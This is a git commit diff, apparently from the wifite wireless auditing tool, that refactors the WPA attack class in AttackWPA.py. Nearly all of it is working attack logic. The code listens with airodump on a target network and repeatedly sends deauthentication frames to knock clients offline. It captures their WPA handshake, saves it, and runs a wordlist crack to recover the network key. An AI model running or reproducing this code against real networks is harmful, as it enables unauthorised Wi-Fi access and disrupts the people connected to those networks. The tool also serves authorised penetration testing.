Refactor WPA handshake capture
TODO: Argument to ignore old handshakes
This commit is contained in:
derv82
173
py/AttackWPA.py
173
py/AttackWPA.py
@@ -34,6 +34,35 @@ class AttackWPA(Attack):
|
||||
self.success = False
|
||||
return self.success
|
||||
|
||||
handshake = None
|
||||
|
||||
# Capture the handshake ("do it live!")
|
||||
if handshake is None:
|
||||
handshake = self.capture_handshake()
|
||||
|
||||
if handshake is None:
|
||||
# Failed to capture handshake
|
||||
self.success = False
|
||||
return self.success
|
||||
|
||||
# Analyze handshake
|
||||
Color.pl('\n{+} analysis of captured handshake file:')
|
||||
handshake.analyze()
|
||||
|
||||
# Crack it
|
||||
key = self.crack_handshake(handshake, Configuration.wordlist)
|
||||
if key is None:
|
||||
self.success = False
|
||||
else:
|
||||
self.crack_result = CrackResultWPA(bssid, essid, handshake.capfile, key)
|
||||
self.crack_result.dump()
|
||||
self.success = True
|
||||
return self.success
|
||||
|
||||
def capture_handshake(self):
|
||||
''' Returns captured or stored handshake, otherwise None '''
|
||||
handshake = None
|
||||
|
||||
# First, start Airodump process
|
||||
with Airodump(channel=self.target.channel,
|
||||
target_bssid=self.target.bssid,
|
||||
@@ -48,93 +77,83 @@ class AttackWPA(Attack):
|
||||
|
||||
bssid = airodump_target.bssid
|
||||
essid = airodump_target.essid if airodump_target.essid_known else None
|
||||
handshake = self.load_handshake(bssid=bssid, essid=essid)
|
||||
|
||||
if handshake:
|
||||
Color.pl('\n\n{+} {G}using existing handshake found at %s{W}' % handshake.capfile)
|
||||
Color.pl('\n{+} {G}successfully loaded handshake{W}')
|
||||
else:
|
||||
timeout_timer = Timer(Configuration.wpa_attack_timeout)
|
||||
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
|
||||
|
||||
while handshake is None and not timeout_timer.ended():
|
||||
step_timer = Timer(1)
|
||||
# Try to load existing handshake
|
||||
if Configuration.ignore_old_handshakes == False:
|
||||
handshake = self.load_handshake(bssid=bssid, essid=essid)
|
||||
if handshake:
|
||||
Color.clear_entire_line()
|
||||
Color.pattack("WPA",
|
||||
airodump_target,
|
||||
"Handshake capture",
|
||||
"Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})" % (len(self.clients), deauth_timer, timeout_timer))
|
||||
Color.pl('{+} found {G}existing handshake{W} for {C}%s{W}' % handshake.essid)
|
||||
Color.pl('{+} from {C}%s{W}' % handshake.capfile)
|
||||
return handshake
|
||||
|
||||
# Find .cap file
|
||||
cap_files = airodump.find_files(endswith='.cap')
|
||||
if len(cap_files) == 0:
|
||||
# No cap files yet
|
||||
time.sleep(step_timer.remaining())
|
||||
continue
|
||||
cap_file = cap_files[0]
|
||||
timeout_timer = Timer(Configuration.wpa_attack_timeout)
|
||||
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
|
||||
|
||||
# Copy .cap file to temp for consistency
|
||||
temp_file = Configuration.temp('handshake.cap.bak')
|
||||
copy(cap_file, temp_file)
|
||||
while handshake is None and not timeout_timer.ended():
|
||||
step_timer = Timer(1)
|
||||
Color.clear_entire_line()
|
||||
Color.pattack("WPA",
|
||||
airodump_target,
|
||||
"Handshake capture",
|
||||
"Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})" % (len(self.clients), deauth_timer, timeout_timer))
|
||||
|
||||
# Check cap file in temp for Handshake
|
||||
bssid = airodump_target.bssid
|
||||
essid = airodump_target.essid if airodump_target.essid_known else None
|
||||
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
|
||||
if handshake.has_handshake():
|
||||
# We got a handshake
|
||||
Color.pl('\n\n{+} {G}successfully captured handshake{W}')
|
||||
break
|
||||
|
||||
# There is no handshake
|
||||
handshake = None
|
||||
# Delete copied .cap file in temp to save space
|
||||
os.remove(temp_file)
|
||||
|
||||
# Look for new clients
|
||||
airodump_target = self.wait_for_target(airodump)
|
||||
for client in airodump_target.clients:
|
||||
if client.station not in self.clients:
|
||||
Color.clear_entire_line()
|
||||
Color.pattack("WPA",
|
||||
airodump_target,
|
||||
"Handshake capture",
|
||||
"Discovered new client: {G}%s{W}" % client.station)
|
||||
Color.pl("")
|
||||
self.clients.append(client.station)
|
||||
|
||||
# Send deauth to a client or broadcast
|
||||
if deauth_timer.ended():
|
||||
self.deauth(airodump_target)
|
||||
# Restart timer
|
||||
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
|
||||
|
||||
# Sleep for at-most 1 second
|
||||
# Find .cap file
|
||||
cap_files = airodump.find_files(endswith='.cap')
|
||||
if len(cap_files) == 0:
|
||||
# No cap files yet
|
||||
time.sleep(step_timer.remaining())
|
||||
continue # Handshake listen+deauth loop
|
||||
continue
|
||||
cap_file = cap_files[0]
|
||||
|
||||
if not handshake:
|
||||
# No handshake, attack failed.
|
||||
Color.pl("\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds" % (Configuration.wpa_attack_timeout))
|
||||
self.success = False
|
||||
return self.success
|
||||
# Copy .cap file to temp for consistency
|
||||
temp_file = Configuration.temp('handshake.cap.bak')
|
||||
copy(cap_file, temp_file)
|
||||
|
||||
# Save copy of handshake to ./hs/
|
||||
self.save_handshake(handshake)
|
||||
# Check cap file in temp for Handshake
|
||||
bssid = airodump_target.bssid
|
||||
essid = airodump_target.essid if airodump_target.essid_known else None
|
||||
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
|
||||
if handshake.has_handshake():
|
||||
# We got a handshake
|
||||
Color.pl('\n\n{+} {G}successfully captured handshake{W}')
|
||||
break
|
||||
|
||||
# Print analysis of handshake file
|
||||
Color.pl('\n{+} analysis of captured handshake file:')
|
||||
handshake.analyze()
|
||||
# There is no handshake
|
||||
handshake = None
|
||||
# Delete copied .cap file in temp to save space
|
||||
os.remove(temp_file)
|
||||
|
||||
# Try to crack handshake
|
||||
key = self.crack_handshake(handshake, Configuration.wordlist)
|
||||
if key is None:
|
||||
self.success = False
|
||||
else:
|
||||
self.crack_result = CrackResultWPA(bssid, essid, handshake.capfile, key)
|
||||
self.crack_result.dump()
|
||||
self.success = True
|
||||
return self.success
|
||||
# Look for new clients
|
||||
airodump_target = self.wait_for_target(airodump)
|
||||
for client in airodump_target.clients:
|
||||
if client.station not in self.clients:
|
||||
Color.clear_entire_line()
|
||||
Color.pattack("WPA",
|
||||
airodump_target,
|
||||
"Handshake capture",
|
||||
"Discovered new client: {G}%s{W}" % client.station)
|
||||
Color.pl("")
|
||||
self.clients.append(client.station)
|
||||
|
||||
# Send deauth to a client or broadcast
|
||||
if deauth_timer.ended():
|
||||
self.deauth(airodump_target)
|
||||
# Restart timer
|
||||
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
|
||||
|
||||
# Sleep for at-most 1 second
|
||||
time.sleep(step_timer.remaining())
|
||||
continue # Handshake listen+deauth loop
|
||||
|
||||
if handshake is None:
|
||||
# No handshake, attack failed.
|
||||
Color.pl("\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds" % (Configuration.wpa_attack_timeout))
|
||||
return handshake
|
||||
else:
|
||||
# Save copy of handshake to ./hs/
|
||||
self.save_handshake(handshake)
|
||||
return handshake
|
||||
|
||||
def crack_handshake(self, handshake, wordlist):
|
||||
'''Tries to crack a handshake. Returns WPA key if found, otherwise None.'''
|
||||
|
||||
Reference in New Issue
Block a user